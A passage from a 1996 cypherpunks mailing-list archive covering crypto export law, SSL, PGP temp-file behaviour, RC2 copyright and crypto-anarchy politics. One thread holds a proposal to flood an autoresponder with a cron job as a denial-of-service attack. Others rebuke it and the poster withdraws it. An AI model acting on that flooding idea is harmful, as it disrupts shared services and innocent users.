AS> hosts who have died of natural causes to recover the mind control
AS> devices.

	Yes, but if the Grays systematically abduct all first year med
school students, who is going to perform the autopsies?

AS> Suggest you amend the last sentence to read "...one of these
AS> devices, which dissolve immediately upon death, and which are
AS> impossible to remove..."  etc, etc.

	Alternatively, the mind control devices are nanites,
undetectable by terran technology.  This also circumvents the problem
of detection while the host is alive.

-- 
#include <disclaimer.h>                               /* Sten Drescher */
Unsolicited email advertisements will be proofread for a US$100/page fee.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Wed, 7 Feb 1996 00:36:56 +0800
To: paralax@alpha.c2.org
Subject: Re: attila sez
Message-ID: <9602061611.AA03651@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>of the word "Jap" to describe the Japanese people after demonstrating a gross

You know what is on the sign of Honda dealerships in Paris?
	JapAuto

Go figure.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Wed, 7 Feb 1996 01:13:27 +0800
To: cypherpunks@toad.com
Subject: [noise] the individual and the tribe
Message-ID: <9602061649.AA14934@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


Rob said:

> ... in the sense that
>tribal societies are individualist.

I absolutely don't agree.  The subordination of the individual to the tribe
is fundamental of their vision of the world.  Individualism is not about the
personnal opinions, it is about the vision of Man as an entity in itself, not
a type of cattle that owe his service to the collectivity of the tribe.

Crypto makes the tribe (and it's sorcerers) loose their grip... :)

JFA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Wed, 7 Feb 1996 14:58:26 +0800
To: Dave Del Torto <cypherpunks@toad.com>
Subject: Re: [NOISE] Paranormally Good Privacy
Message-ID: <2.2.32.19960206201930.00964940@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:48 AM 2/6/96 -0800, Dave Del Torto wrote:

>1996-02-06	PGP-Y
>
>Our paranormal testing program has already had one commercial spin-off. Our
>engineers have developed a truly foolproof data security protocol. It is
>called PGP-Y -- "Pretty Good Parasychology." The mechanism is simple. You
>imagine that you have transmitted data to someone; that person then
>imagines that he has received it. Using PGP-Y, any type of information can
>be transmitted over the Internet with complete security. The key is that
>the data is transmitted high over the net -- so high that the data actually
>travels above the net rather than within it. The data is transmitted
>telepathically (and for those who distrust electronic funds, we also have a
>scheme for transmitting cash and gold plate telekinetically.)

There were a number of times where I had to explain to users that the "T" in
TCP/IP did not stand for "Telepathic". (Glad I am not doing that anymore...
I would expect calls from people looking for that version.  And when we
would support it...)
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
         Is the operating system half NT or half full?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 7 Feb 1996 05:21:53 +0800
To: jirib@cs.monash.edu.au
Subject: Re: [noise] Re: Crippled Notes export encryption
Message-ID: <m0tju28-0008zPC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:11 PM 2/6/96 +1100, Jiri Baum wrote:

>Forget about Jeff, how about PGP? Put it on a rocket (I'm *sure* there's
>an amateur rocket club conveniently located near the border), and off
>you go! (I guess you'd want to check @ 126.1 first, though).
>
>Have I missed anything?


Another question is this:  Would the point-to-point (USA to USA) 
transmission of PGP by radio (say, a satellite telephone bounce) that is 
"inadvertently" intercepted external to the US qualify as a violation of 
ITAR?  It would be hard for the NSA to criticize this, as this is their main 
operations area.  Besides, if anybody was prosecuted, they'd presumably be 
able to subpoena the NSA about their monitoring operations, to determine if 
the NSA was violating any OTHER country's anti-export laws, etc.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tony Iannotti <tony@secapl.com>
Date: Wed, 7 Feb 1996 02:11:08 +0800
To: geoff klein <geoff@commtouch.co.il>
Subject: Re: Release of Pronto Secure first Beta
In-Reply-To: <9602061652.AB19328@commtouch.co.il>
Message-ID: <Pine.A32.3.91.960206123552.136397N-100000@fozzie.secapl.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 6 Feb 1996, geoff klein wrote:
 
> We plan to make Pronto Secure available via FTP at the end of this week. 
> Parties interested in joining the beta-test program are invited to send me 
> pgp-signed e-mail requesting download instructions and our public key for 
> authenticating the version. Beta-testers who provide us with feed-back will 

  Here is the public key to decode upcoming signed message::

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzCwv/YAAAEEAMW6NTWHwgwxIbPTBAZjirYPoHNcW0yAb23k+EMLBbG9WIRa
h84U6+Ob0XQYoP6U57JCAVpkWz/OiPfAt7qoFaQgEtugl+XTRqYqxF4zueQpS5Bi
n/3HsGiig+daZDDTwvxvuqbB2K+AV2WzOlOjRQI3HssEHl0OtqPu8jBP0vEJAAUR
tB9Ub255IElhbm5vdHRpIDx0b255QHNlY2FwbC5jb20+
=BICo
-----END PGP PUBLIC KEY BLOCK-----


_________________________________________________________________________
Tony Iannotti                                                Security APL
tony@secapl.com                                         101 Hudson Street
201/332-2020                                        Jersey City, NJ 07302




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: printing@explicit.com (William Knowles)
Date: Wed, 7 Feb 1996 03:35:18 +0800
To: Cypherpunks@toad.com
Subject: OCAF White Paper on porn on the net
Message-ID: <m0tjshX-000rNaC@maki.wwa.com>
MIME-Version: 1.0
Content-Type: text/plain


Hello all,

With the passing of the CDA recently, The first wounding of the rights
of free speech online, The Oklahomans for Children and Families are going 
in for the kill.  A WWW  site has been set up with a HTML version of what 
the autoresponder sends out.

http://www.bway.net/~dfenton/noporn.html

This is a scary document, and was originally written as a prosecution primer
for law enforcement. 
 

-William Knowles


..

//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\ 
  Graphically Explicit                     
  Printing - Advertising - Graphic Design  
  1555 Sherman Avenue - Suite 203          
  Evanston IL., 60201-4421                 
  800.570.0471 - printing@explicit.com
  Accept, Embrace, Adapt, Create     
\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 7 Feb 1996 06:10:54 +0800
To: zinc <zinc@zifi.genetics.utah.edu>
Subject: Re: The OCAF's White Paper on Internet Pornography
In-Reply-To: <Pine.LNX.3.91.960206132917.8103C-100000@zifi.genetics.utah.edu>
Message-ID: <Pine.ULT.3.91.960206131338.22081G@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 6 Feb 1996, zinc wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> regarding this paper;  it's sent out by an autoresponder.  is it illegal 
> to make excessive use of the autoresponder?  this would be a type of 
> denial of service attack.
>
> i'm wondering if i set up a cron job to request a copy every 5 or 10 
> minutes and just send it to /dev/nul, could i get in more trouble than 
> say, someone just telling me to cut it out?

Regardless of the legal merits, this would be called "being an asshole." 
The guy who runs mailback.com is just another common carrier. 

- -rich
 http://www-leland.stanford.edu/~llurch/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMRfFJI3DXUbM57SdAQFXwQQAn1IQKS6uU2MVWZbePCG1D19lmVKfBzry
L9rxdcEXCoHDpSlyqdIiv7b2SJ2PzRj8aB9p2sA1F8lyaiO4xj+21YJE/RBQ6vi7
J/VwcO6ZCvJ8Wqq6SHU+HqeuCRqV2SR/WWZtdryZGRCOeT2zVeawOlu9qxMygcgF
bsWXUea2A/k=
=/aC3
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lunaslide@loop.com
Date: Wed, 7 Feb 1996 06:16:33 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Reasons in support of crypto-anarchy WAS Re: Why am I wrong?
Message-ID: <v01530500ad3d72cc27bd@[204.179.169.75]>
MIME-Version: 1.0
Content-Type: text/plain


<snip about crypto-anarchists taking a no compromise position>
>
><sigh>  Well, I suppose that if there is anyone who is most opposed to the
>opinion you expressed in the paragraph above, it is myself.
>
>I believe:
>
>1.  Governments will no longer be "necessary," if they ever were.
>
>2.  Protection will no longer depend on having a "government."
>
>3.  Anonymous networking technology will protect our rights, to the extent
>they can be protected.
>
>4.  Your statement, "...anarchy is a massive step backward..." is absolutely
>incorrect.
>

That's fine that you believe the things, but for acceptance by others you
will have to provide support for your position.  I, personally, would like
to see your premises so that I may evualuate your claims.  You may indeed
be correct in your assessment.

Jeff Conn

lunaslide

On the meridian of time there is no injustice, only the poetry of motion
creating the illusion of truth and drama.
                                                Henry Miller

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQBvAzD3EHEAAAEDAMVwZzXozPjX18mCenA5fJsdWZXcrhJCxPR+SoVCmR7d4ZVU
mwITzPTHo/GyLvJrWyk5YdhheczyY2VSawaMrCN/nWA7K9lwAylbKyPxqBhRYJ3C
2wi2uD5LY2wypNOQyQARAQABtB5KZWZmIENvbm4gPGx1bmFzbGlkZUBsb29wLmNv
bT6JAHUDBRAw+1bqS2NsMqTTkMkBAQkTAwCersFbCyk8O0MbGlNcZDAe24CLEWQ0
0C5EHni33W76UsG1bybcLsuMH6HVwLF7IqZivnzc7wkujYPQvCqn8HEYYTld8V9V
Cou4dOvA8kV7rHvAn/LuLx7DRruLFrRoPSk=
=OIT9
-----END PGP PUBLIC KEY BLOCK-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 7 Feb 1996 06:17:56 +0800
To: zinc <zinc@zifi.genetics.utah.edu>
Subject: Re: The OCAF's White Paper on Internet Pornography
In-Reply-To: <Pine.LNX.3.91.960206132917.8103C-100000@zifi.genetics.utah.edu>
Message-ID: <Pine.ULT.3.91.960206131909.22081H-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 6 Feb 1996, zinc wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> regarding this paper;  it's sent out by an autoresponder.  is it illegal 
> to make excessive use of the autoresponder?  this would be a type of 
> denial of service attack.
> 
> i'm wondering if i set up a cron job to request a copy every 5 or 10 
> minutes and just send it to /dev/nul, could i get in more trouble than 
> say, someone just telling me to cut it out?

This would be bad, but

TAKE A LOOK AT THE DOCUMENT RIGHT NOW!!! The fun starts about a page down.

 http://www.bway.net/~dfenton/noporn.html

Whoever "DWF" is deserves a medal.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Usuario Acceso2 <acceso2@diatel.upm.es>
Date: Tue, 6 Feb 1996 20:53:15 +0800
To: cypherpunks@toad.com
Subject: PGP's "only for your eyes"
Message-ID: <260*/S=acceso2/OU=diatel/O=upm/PRMD=iris/ADMD=mensatex/C=es/@MHS>
MIME-Version: 1.0
Content-Type: text/plain


Hi

Maybe some of you already know about this.

Whe reading PGP's "Only for your eyes" messages, the program creates a 
temporary file containing the plaintext in the directory where the cyphertext 
file is.

So, don't worry about this option, it's quite useless.

Best

Jaime





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 7 Feb 1996 06:25:53 +0800
To: zinc <cypherpunks@toad.com>
Subject: Yes, I'm an idiot Re: The OCAF's White Paper on Internet Pornography
In-Reply-To: <Pine.ULT.3.91.960206131909.22081H-100000@Networking.Stanford.EDU>
Message-ID: <Pine.ULT.3.91.960206133006.22081I-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


I'd thought that this was a "friendly" site that had been hacked. It's 
not. But the comments are pretty funny regardless.

-rich

On Tue, 6 Feb 1996, Rich Graves wrote:

> On Tue, 6 Feb 1996, zinc wrote:
> 
> > -----BEGIN PGP SIGNED MESSAGE-----
> > 
> > regarding this paper;  it's sent out by an autoresponder.  is it illegal 
> > to make excessive use of the autoresponder?  this would be a type of 
> > denial of service attack.
> > 
> > i'm wondering if i set up a cron job to request a copy every 5 or 10 
> > minutes and just send it to /dev/nul, could i get in more trouble than 
> > say, someone just telling me to cut it out?
> 
> This would be bad, but
> 
> TAKE A LOOK AT THE DOCUMENT RIGHT NOW!!! The fun starts about a page down.
> 
>  http://www.bway.net/~dfenton/noporn.html
> 
> Whoever "DWF" is deserves a medal.
> 
> -rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zinc <zinc@zifi.genetics.utah.edu>
Date: Wed, 7 Feb 1996 04:57:47 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: The OCAF's White Paper on Internet Pornography
Message-ID: <Pine.LNX.3.91.960206132917.8103C-100000@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

cpunks,


regarding this paper;  it's sent out by an autoresponder.  is it illegal 
to make excessive use of the autoresponder?  this would be a type of 
denial of service attack.

i'm wondering if i set up a cron job to request a copy every 5 or 10 
minutes and just send it to /dev/nul, could i get in more trouble than 
say, someone just telling me to cut it out?

opinions?

- -pjf


"Those that give up essential liberty to obtain a little temporary
 safety deserve neither liberty nor safety." -- Benjamin Franklin (1773)
			  finger for PGP key
zifi runs LINUX 1.3.57 -=-=-=WEB=-=-=->  http://zifi.genetics.utah.edu 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by mkpgp1.6, a Pine/PGP interface.

iQCVAwUBMRe7B03Qo/lG0AH5AQF6KwP/XAQq4yoi0Ytetl6rUnnCJBvbNktRmSEP
3D+ILw4+qn4YDQX96Q6+SoGYD/9zHu59ywFWk42hYCXYNhOpo+GBTF9uGWIb5lD6
/DdzSLDpCKUvggmI395STqoEBuKj5ILSGBzDZGfnw6g6IAcJIRwnwiE/MhLjgKof
2S0mWLFc4aQ=
=+twb
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Weinstein <tomw@netscape.com>
Date: Wed, 7 Feb 1996 06:38:41 +0800
To: cypherpunks@toad.com
Subject: Re: "PGP-Scape"? (was Re: Our "New Order")
In-Reply-To: <199602060726.CAA12115@bb.hks.net>
Message-ID: <3117CEFE.237C@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Deranged Mutant wrote:
> 
> No. SSL doesn't encrypt everything, just certain transactions (or am I
> wrong about this?)  Something that keeps everything encrypted and
> anonymous.

SSL encrypts everything that goes across an SSL connection.

-- 
Sure we spend a lot of money, but that doesn't mean | Tom Weinstein
we *do* anything.  --  Washington DC motto          | tomw@netscape.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Wed, 7 Feb 1996 06:58:39 +0800
To: Deranged Mutant <wlkngowl@unix.asb.com>
Subject: Re: "PGP-Scape"? (was Re: Our "New Order")
In-Reply-To: <199602060726.CAA12115@bb.hks.net>
Message-ID: <3117D186.4A10@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Deranged Mutant wrote:
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> cp@proust.suba.com (Alex Strasheim) wrote:
> >> There's also less worry about secure transactions, since if
> >> everything's encrypted it's harder to tell if a transaction is taking
> >> place, viewing porno or subversive or religious, literature,  or if
> >> you're just reading something mundane.
> >
> >I think I must be missing something here.  Aren't you describing an SSL
> >web server?  Different algorithms, but basically the same idea?
> 
> No. SSL doesn't encrypt everything, just certain transactions (or am I
> wrong about this?)  Something that keeps everything encrypted and
> anonymous.

  SSL encrypts everything passed over the connection.  When running HTTP
over SSL that includes the URL being accessed, username and password for
HTTP auth, and cookies.

> >Netscape 2.0 is out for real -- everyone can now pick their certs.  GAK
> >just got harder.
> 
> As opposed to the imaginary beta?

  The beta will expire in a few months.  The final release will not expire.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Tue, 6 Feb 1996 11:34:06 +0800
To: alano@teleport.com (Alan Olsen)
Subject: Re: [noise] Re: Crippled Notes export encryption
In-Reply-To: <2.2.32.19960125090719.008efa3c@mail.teleport.com>
Message-ID: <199602060311.OAA11630@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


Hello

Alan Olsen wrote:

...
> So we could launch Jeff Wienstien in a rocket without violating ITAR as long
> as we do not sell him.

Forget about Jeff, how about PGP? Put it on a rocket (I'm *sure* there's
an amateur rocket club conveniently located near the border), and off
you go! (I guess you'd want to check @ 126.1 first, though).

Have I missed anything?


Jiri
--
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: arromdee@jyusenkyou.cs.jhu.edu (Ken Arromdee)
Date: Wed, 7 Feb 1996 04:00:16 +0800
To: cypherpunks@toad.com
Subject: Re: RC2 protected by copyright?
In-Reply-To: <199602050211.SAA18120@hammerhead.com>
Message-ID: <4f8a81$opp@jyusenkyou.cs.jhu.edu>
MIME-Version: 1.0
Content-Type: text/plain


>RC2, though, as 256 bytes of seemingly random data at the head of it,
>in a permutation table.  This is clearly not any idea, but a bit of
>text.  This text would have to be copied to any interoperable RC2.
>(You could surely use some different permutation, and probably most
>of the 256! permutations would be equally secure, but would not
>interoperate with RC2).  I would expect that this copying of text be
>held to be a violation of copyright.

What about "merger"?  If there's only one way to write a table to make it
interoperable, could it be ruled that the idea has merged with its expression
and thus be legal to copy?
--
Ken Arromdee (arromdee@jyusenkyou.cs.jhu.edu, karromde@nyx.cs.du.edu;
    http://www.cs.jhu.edu/~arromdee)

"Snow?" "It's sort of like white, lumpy, rain." --Gilligan's Island




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Pettitt <jpp@software.net>
Date: Wed, 7 Feb 1996 07:04:27 +0800
To: Tom Weinstein <cypherpunks@toad.com
Subject: Re: "PGP-Scape"? (was Re: Our "New Order")
Message-ID: <2.2.32.19960206223328.00cbb948@mail.software.net>
MIME-Version: 1.0
Content-Type: text/plain


At 01:58 PM 2/6/96 -0800, Tom Weinstein wrote:
>Deranged Mutant wrote:
>> 
>> No. SSL doesn't encrypt everything, just certain transactions (or am I
>> wrong about this?)  Something that keeps everything encrypted and
>> anonymous.
>
>SSL encrypts everything that goes across an SSL connection.
>
>
I think the confusion is that most sites don't run anything but transactions
over the SSL link for speed reasons.  Anything the the user and/or webmaster
*choose* to send over an SSL pipe is protected (assuming non export versions).



  

John Pettitt, jpp@software.net
VP Engineering, CyberSource Corporation, 415 473 3065
 "Technology is a way of organizing the universe so that man
  doesn't have to experience it." - Max Frisch





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Wed, 7 Feb 1996 08:12:20 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: INCHOATE CYPHERPUNK JOBS
Message-ID: <Pine.SUN.3.91.960206151604.15553A-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

Friends of mine are working on projects that would call for 
C'punk types.  If anything sounds interesting, let me know and
I will pass your name (and resume) along.

1.	Design, build and maintain an ISP in Costa Rica.
	Later, you would design and program a financial
	application (I can say no more).  Knowledge of
	crypto, networks, databases, etc. required.

2.	Design, build and maintain a LAN with high
	bandwidth connection to the Internet in Hawaii.
	This would be in a high-tech, high-security
	residential enclave for wealthy telecommuting
	entrepreneurs, writers, semi-retired CEOs and
	other information professionals.

3.	Design, build and maintain an international
	Internet gambling-related service business
	probably located outside of the US (Saipan?).

In each of the above businesses, developement money is readily
available, but the principals are currently finishing up other
projects.


 S a n d y

P.S.	Bay Area C'punks can get the inside skinny from
	me at my party on Saturday.  Have YOU RSVPed yet?

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cmca@alpha.c2.org (Chris McAuliffe)
Date: Wed, 7 Feb 1996 08:38:40 +0800
To: cypherpunks@toad.com
Subject: Re: PGP's "only for your eyes"
Message-ID: <199602062336.PAA24566@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[To: cypherpunks@toad.com]
[Subject: Re: PGP's "only for your eyes"]

Usuario Acceso2 <acceso2@diatel.upm.es> wrote:
	Maybe some of you already know about this.

	Whe reading PGP's "Only for your eyes" messages, the program
	creates a temporary file containing the plaintext in the
	directory where the cyphertext file is.

	So, don't worry about this option, it's quite useless.

The manual points out that you shouldn't rely on it. Its main purpose is
simply to prevent accidentally or automatically leaving the plaintext
lying around, not to actually securely guarantee that behaviour. After
all, you could always cut-and-paste the text, or (since you have the PGP
source) alter PGP to ignore the flag.

The real problem is not what it does, but what people *think* it might
do.

I take that back. When I check the manual, it doesn't say that it is
insecure. It really ought to. At least one of the books about PGP does
though, I know I've read it somewhere other than email.

Chris McAuliffe <cmca@alpha.c2.org> (No, not that one.)

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBMRfm+oHskC9sh/+lAQHgygQAs4gsA3DWORL06++EpiQahmDOj6JZJKaD
CTkljTcGA1WoY6LNEwGrEMBSs1NoaY6JT+KgxAeP/HOxTJDKwRkAdU+/psjMT9t6
rqERq6HerBKIBqUj/nOsbhnigA2U+e3gto9Fpvs5gld6oQvbyn3M56PWXrm9dbBX
N2KqJ8BcQTE=
=eRZ2
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zinc <zinc@zifi.genetics.utah.edu>
Date: Wed, 7 Feb 1996 07:11:18 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: The OCAF's White Paper on Internet Pornography
In-Reply-To: <199602062210.RAA26298@gatekeeper.itribe.net>
Message-ID: <Pine.LNX.3.91.960206154425.8103G-100000@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

howdy folks,

it's been pointed out to me that the attack i mentioned would be unfair 
to others who use this ISP.  i will not be doing any mass mailing and i 
suggest others refrain from doing so as well.

the document is good reading, although it does hurt your head if you've 
had any logic at all.  i guess those years of debate weren't for nothing 
after all...

- -pat finerty
biochem grad student

"Those that give up essential liberty to obtain a little temporary
 safety deserve neither liberty nor safety." -- Benjamin Franklin (1773)
			  finger for PGP key
zifi runs LINUX 1.3.57 -=-=-=WEB=-=-=->  http://zifi.genetics.utah.edu 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by mkpgp1.6, a Pine/PGP interface.

iQCVAwUBMRfao03Qo/lG0AH5AQEItwQAk8V6LlIfLEKA+HgvyseAVZcWaNgnGvzP
Yduj9cs6eQYE64uaccYWsmHFLg1I/VlxyuF/FOh658xPDgSYUDFPPYRJB/fZhQfz
ga6cQ5CbOaRiGY/7H2fdoUn5Y0kG35hfZ6LYg0EARgo4BphtNSFdTg9TGECdlAsE
5MmwIxUumDA=
=jk9n
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lunaslide@loop.com
Date: Wed, 7 Feb 1996 08:28:53 +0800
To: "A. Padgett Peterson, P.E. Information Security"	 <PADGETT%TCCSLR@emamv1.orl.mmc.com>
Subject: Re: Why am I wrong?
Message-ID: <v01530505ad3d945508b6@[204.179.169.88]>
MIME-Version: 1.0
Content-Type: text/plain


>>I don't think that I am stating a position of cypher-anarchy, but
>>advocating a position of personal privacy guaranteed by the Fourth
>>Amendment.
>
>Don't forget the other side of the conversation. While the government
>cannot (notice I did not say they might not try) effectively control
>communication, there are other points at which control may be exerted:

These exceptions are noted.
>
>1) communications *with* the government (IRS, Social Security, etc).

I would want the govt. to understand what I am sending them and I would
want to understand what they are sending me.  Hell, they can have my public
key too ;-)  But I don't see how they could exercise control simply because
I am communicating with them.  They cannot come blow my door down or even
slap my hand if they know I use encryption in all of my other
transmissions.  Perhaps I do not understand your point.  They can perhaps
control the communication between them and me, but not between me and
everyone else.

>2) communications using someone else's equipment/network (university,
>   employer, etc)

Employers nor universities have any jurisdiction over whether you use
encryption in your transmissions while using their networks unless it
specifically does not allow it when you first agree to have an account with
them.  Even in that case, they would be hard pressed to enforce it on a
university wide basis.  I would hope that employers would be smart enough
to encourage the use of encryption for their employees, even if they are
personal messages.  It would decrease their competitions chances to
intercept and decode the important, sensitive info because it would be
immersed in even more, unimportant info that is encrypted as well.

The govt. has control over the universities in that they are the ones who
fund them.  If the govt. denied funds to a given college because they did
not regulate the type of encryption, or alieviate the encryption use
entirely, what reasoning would they give to the schools board and the
public for restricting something that is not against the law and is, in
fact, protected by a constituional amendment.  It would not fly with the
voters.

>3) communications with anyone (Internet merchant, etc) who says "this
>   is not what <MasterCard|Visa|AmEx> approves..."

I don't quite understand your meaning.  I am a merchant and I encourage my
customers to use PGP when they send information over the internet, whether
to me or to anyone else.  I explain to them the reasons for this, assisted
by Mr. Zimmermann's excellent analogy of the postcard/envelope difference.
Most are business people and readily accept the reasoning and are willing
to incorperate it into their dealings.  To respond to this point, I would
need to understand it better.  What is not what Mastercard, et al approves?
The encryption?

>Each of these may have compelling reasons for complying with what the
>government wants even if it is not law. IMNSHO "law" is just a means
>for exacting retribution/revenge - if you have to resort to it, you
>have already lost.
>
Indeed, there would be some impact from what point out, however, it would
not be enough pressure to suppress the encryption movement unless it became
painfully, and obviously, unconstitutional.  Law is optimally there for us
to redress grievences.  There will be skirmishes on the legal front for the
next 5 or 6 years, as far as I can see, but eventually the Surpreme Court
will set enough precidents that procecutors will be left with little power.
I don't think this is an optomistic view, but a realistic one based on the
current events and on decisions in related matters by the court in the
past.

Comments?  Bring 'em on! :-)

Respectfully,
Jeff Conn

PS  Yeah for Zimmermann and crew!

lunaslide

On the meridian of time there is no injustice, only the poetry of motion
creating the illusion of truth and drama.
                                                Henry Miller

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQBvAzD3EHEAAAEDAMVwZzXozPjX18mCenA5fJsdWZXcrhJCxPR+SoVCmR7d4ZVU
mwITzPTHo/GyLvJrWyk5YdhheczyY2VSawaMrCN/nWA7K9lwAylbKyPxqBhRYJ3C
2wi2uD5LY2wypNOQyQARAQABtB5KZWZmIENvbm4gPGx1bmFzbGlkZUBsb29wLmNv
bT6JAHUDBRAw+1bqS2NsMqTTkMkBAQkTAwCersFbCyk8O0MbGlNcZDAe24CLEWQ0
0C5EHni33W76UsG1bybcLsuMH6HVwLF7IqZivnzc7wkujYPQvCqn8HEYYTld8V9V
Cou4dOvA8kV7rHvAn/LuLx7DRruLFrRoPSk=
=OIT9
-----END PGP PUBLIC KEY BLOCK-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson, P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Wed, 7 Feb 1996 05:52:26 +0800
To: lunaslide@loop.com
Subject: RE: Why am I wrong?
Message-ID: <960206160510.20215305@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain


>I don't think that I am stating a position of cypher-anarchy, but
>advocating a position of personal privacy guaranteed by the Fourth
>Amendment. 

Don't forget the other side of the conversation. While the government 
cannot (notice I did not say they might not try) effectively control
communication, there are other points at which control may be exerted:

1) communications *with* the government (IRS, Social Security, etc).
2) communications using someone else's equipment/network (university,
   employer, etc)
3) communications with anyone (Internet merchant, etc) who says "this
   is not what <MasterCard|Visa|AmEx> approves..."

Each of these may have compelling reasons for complying with what the
government wants even if it is not law. IMNSHO "law" is just a means
for exacting retribution/revenge - if you have to resort to it, you
have already lost.
						Warmly,
							Padgett

					




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Decius <decius@montag33.residence.gatech.edu>
Date: Wed, 7 Feb 1996 05:59:52 +0800
To: PADGETT@hobbes.orl.mmc.com (A. Padgett Peterson P.E. Information Security)
Subject: Re: Why am I wrong?
In-Reply-To: <960206100646.2021253f@hobbes.orl.mmc.com>
Message-ID: <199602062107.QAA30185@montag33.residence.gatech.edu>
MIME-Version: 1.0
Content-Type: text


> OK you is wrong.
:)
> No, most in law enforcement at the working level have no opinion one way 
> or the other. Many I talk to know what it is but few have ever seen 
I should have been more specific, I was thinking about Louis Freeh, et all...
> 
> >The law is often very wrong, and even our lofty constitutional values 
> >do not prevent bad laws. When the law is wrong, the law's enforcer is 
> >the criminal.
> 
> Dangerous attitude to take. The law is never wrong because it is the law.
> The fact that a law exists may be wrong but that has nothing to do with the
> law itself, it merely is. The law's enforcer would be derelect in his/her
> duty if she/he did *not* enforce the law.
> That is the definition of natural law, 
I don't agree. The theory of natural law is basically that when people 
come together to form a society and create a government, they enter into
a social contract. If a member of the society breaks the contract (by, 
